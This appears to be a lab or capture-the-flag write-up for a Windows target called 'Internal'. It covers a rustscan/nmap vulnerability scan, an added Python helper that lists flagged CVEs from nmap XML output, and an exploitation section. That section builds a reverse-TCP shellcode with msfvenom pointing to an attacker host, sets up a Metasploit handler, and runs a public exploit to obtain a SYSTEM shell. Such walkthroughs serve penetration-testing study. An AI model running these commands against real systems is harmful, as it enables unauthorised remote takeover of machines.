Internal

Last updated 3 years ago

nmap

mkdir nmap
sudo rustscan -a 192.168.201.40 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan --scripts vuln

It looks like nmap's vuln scripts detected a CVE on the target.
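
For the system owner, the same scan output doubles as a patch list. The added example below (not part of the original writeup) reads the XML that `-oA` writes (`nmap/all-ports-service-scan.xml`) and lists the scripts that reported a VULNERABLE state along with the CVE ids they cite. The sample XML, script ids, address and CVE numbers are constructed placeholders, and `vulnerable_findings` is a hypothetical helper name.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample in the layout nmap writes with -oX / -oA. The script ids,
# CVE numbers and address are placeholders, not values from the writeup.
SAMPLE_XML = """<nmaprun>
  <host>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445">
        <state state="open"/>
        <script id="example-vuln-check" output="VULNERABLE: IDs: CVE:CVE-0000-0001"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open"/>
        <script id="example-http-check" output="Couldn't find any issues."/>
      </port>
    </ports>
    <hostscript>
      <script id="example-smb-check" output="State: LIKELY VULNERABLE&#10;IDs: CVE:CVE-0000-0002"/>
    </hostscript>
  </host>
</nmaprun>"""

CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")

def vulnerable_findings(xml_text):
    """Return (address, port or 'host', script id, CVE list) per flagged script."""
    findings = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address").get("addr")
        # Port-level scripts sit under <port>, host-level ones under <hostscript>.
        scopes = [(p.get("portid"), p) for p in host.iter("port")]
        scopes += [("host", hs) for hs in host.iter("hostscript")]
        for where, node in scopes:
            for script in node.findall("script"):
                out = script.get("output", "")
                # Keep VULNERABLE / LIKELY VULNERABLE, skip explicit negatives.
                if "VULNERABLE" not in out or "NOT VULNERABLE" in out:
                    continue
                findings.append((addr, where, script.get("id"), sorted(set(CVE_RE.findall(out)))))
    return findings

if __name__ == "__main__":
    for finding in vulnerable_findings(SAMPLE_XML):
        print(finding)
```

To use it on a real scan, pass the contents of the `.xml` file produced by `-oA` instead of `SAMPLE_XML`.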

Exploitation

Let's find the source code of the exploit for this CVE.

Mirror the exploit to your local machine:

searchsploit -m windows/remote/40280.py

Create the shellcode with msfvenom, as per the exploit's instructions:

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.49.201 LPORT=4444 EXITFUNC=thread -f python -v shell

Copy the generated shellcode and use it to replace the shellcode in the exploit's source code.

Open msfconsole and execute the following:

use exploit/multi/handler
set payload windows/shell/reverse_tcp
set lhost tun0
set exitfunc thread
run

Run the exploit:

python 40280.py 192.168.201.40

You should then receive a shell as nt authority\system.